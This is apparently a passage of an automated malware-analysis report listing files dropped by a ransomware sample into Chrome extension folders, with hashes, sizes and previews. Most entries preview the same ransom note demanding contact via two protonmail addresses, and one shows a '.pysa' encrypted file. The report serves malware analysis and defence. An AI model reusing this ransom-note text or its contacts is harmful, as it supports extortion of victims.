                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pt_BR\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pt_PT\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\zh_CN\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\zh_TW\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.129599618059502
                  Encrypted:false
                  SSDEEP:96:i0nHmbe8Wvc6ygFwjH2de0mtFRrc+izo6GdIHEoKrZ3mkvN4eVL:5my8ITY5fRmo6GdIHEoIT4S
                  MD5:F51F858CE1842D6706DCDDDD33416ED5
                  SHA1:4A0B3D82E94E1E345755608BDB7CAED775A18D2E
                  SHA-256:3FF86803B9211C63464048E7D9D9BB429D73DC71B796C511A0A9D4BCC025B1C4
                  SHA-512:BF43119E6EDE0AF8D51501B53FAC477789D5A3CE82D37FE3F46EEF5555BA8019EFC1EDEBCDC32703F3F9A8A10C734A960E73544B29FD674599C72507B317C1BD
                  Malicious:false
                  Preview: ..}\.D..=.X..k....J..y...6..v.P..*%<F.....q7....'&.....o.\(..O`}..X.c...<!.?&.M..rr.....G./.......Ms5Ea@...1. ...cY..z.#AV.9/.=.....^C..9...N.H..9.lp.2K..|C;m...p. .1_'H.L..h..\..0.{...q.m+,.8-....5P.uS. .~..m@....S.Q......j<..|..."..SD..R2./..S.......\C...\.......T..(.>*.<.Mi...*...."@3..wq*..<I...'.Z=2...0yTr.[.o..}...)| W.F..'.c...^p......W.X..UMm....#s..W....-M...+8'......BD.....rt.......2...]N....ACm[%....,I0.0[H....ed.Zs/.k+.W_./*.E...d6.8.i=?......u....(..hL.:-.w.....:e!I6m.b.?[....IY.^.....#..Sqgn.....k@[..9$4~....bQ...|.v5. c..).p0..C.= .a..@....<-.1w."mk{..... 7.D..9$...7....F..h(....".&....t7...2...'w.t7:+j.z..-..n.i..z.M}....\..gXv..BBB.T)5..4..E....U. .;.S.........k.2....q..j..~..&...6.m..FY.'....G.`....E.... ..:.$L.O..:.o.B4..5.4.Z...g.R.a.._pc[RD..J...\...S.DZ.F.......2F1..S.@g..W:..$w.3......]Z..Om.L!_.R.F.g.#.hV.......4..!.?...L.uqaB.........p0.R.X..O.a.....X;_.....{.......R..2d..FB.A..[....".+...2.a.....9.hb..5z...UM~s...ci
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
